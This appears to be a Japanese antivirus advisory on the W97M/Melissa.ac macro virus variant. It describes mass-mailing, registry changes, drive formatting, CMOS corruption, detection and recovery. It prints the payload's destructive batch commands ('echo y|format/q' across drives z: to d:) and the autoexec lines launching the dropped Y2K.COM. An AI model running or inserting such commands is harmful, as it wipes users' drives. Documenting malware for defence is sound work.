ウイルス情報

ウイルス名

W97M/Melissa.ac

危険度
対応定義ファイル 4051 (現在7633)
対応エンジン  (現在5600) 
エンジンバージョンの見分け方
亜種 W97M/Melissa.AD
発見日(米国日付) 99/10/28


このウイルスはW97M/Melissa.aウイルスの亜種である。異なっている点は、マクロの名前が"Melissa"ではなく"Y2K_OK"であることである。ハードドライブのパーティションをフォーマットし、多くのBIOS CMOSの設定をリセットする(ほとんどのBIOSでは"No Harddrive"に設定される)。このウイルスの最初のバージョンでも見られたように、このウイルスはレジストリを改変してWordのセキュリティ設定をオフにし、Outlook98あるいは2000を使って、アドレス帳に登録された多くの送信先に自らのコピーを送信する。

感染した文書が添付されている電子メールの件名は、

"Re:(登録されたユーザ名)" という単純なもので、このユーザ名は、この電子メールを発信したWord97あるいはWord2000をローカル コンピュータにインストールしたときに使用したものである。このメッセージの本文は空欄である。

ローカル コンピュータが感染し、the email part run, この亜種ウイルスは2つのバッチファイル(attribute set read-only)をC:ドライブのルート ディレクトリに書き込み、小さい実行可能ファイル"C:\Y2K.COM"をドロップ(作成)する。その後、最初の発病ルーチン ファイル"C:\drives.bat"が起動されるが、これが次のコマンドを出すことにより、C:のほかすべてのローカル ドライブのフォーマットを試みる。

echo y|format/q z: /v:Empty >NUL
echo y|format/q y: /v:Empty >NUL
echo y|format/q x: /v:Empty >NUL
...
echo y|format/q d: /v:Empty >NUL

2番目のバッチ ファイル"C:\autoexec.bat"は、日付(アメリカの日付フォーマットを使用したシステム上で)を変更し、落とし込まれた実行可能ファイルを以下を使って次回の起動時に立ちあげる。

date 10-18-2099
c:\y2k.com

実行可能ファイル"Y2K.COM"はCMOSデータのBIOSチェックサムを無効にし、その後PCをハングさせる。ユーザはBIOS SETUPに入って、データを確認し再度保存しなければならない。次回のシステム起動時には、F8を押して"C:\autoexec.bat"の起動を回避しなければならないが、CMOSの改変を繰り返すことになり、システムがハングしてしまう。“スタートアップ メニュー”で"Safe mode command prompt only"を選択すると、スタートアップ ファイルを回避し、落とし込まれたファイルを削除してシステムの機能を元に戻すことができる。

このウイルスは、"W97M/Melissa.genウイルスあるいはその亜種"でのヒューリスティック スキャンを使用する場合、VirusScanエンジン v4.0.35とDATファイル4020以上の組み合わせで検出可能。

以下の症状があった場合は、本ウイルスに感染している恐れがある。

感染文書を開いた際のマクロ警告。グローバルテンプレートのサイズの増加。NORMAL.DOTへの改変の確認。システム ファイルの削除(上記参照)。上記の特徴をもつ電子メールを受信したという、他のユーザからの苦情。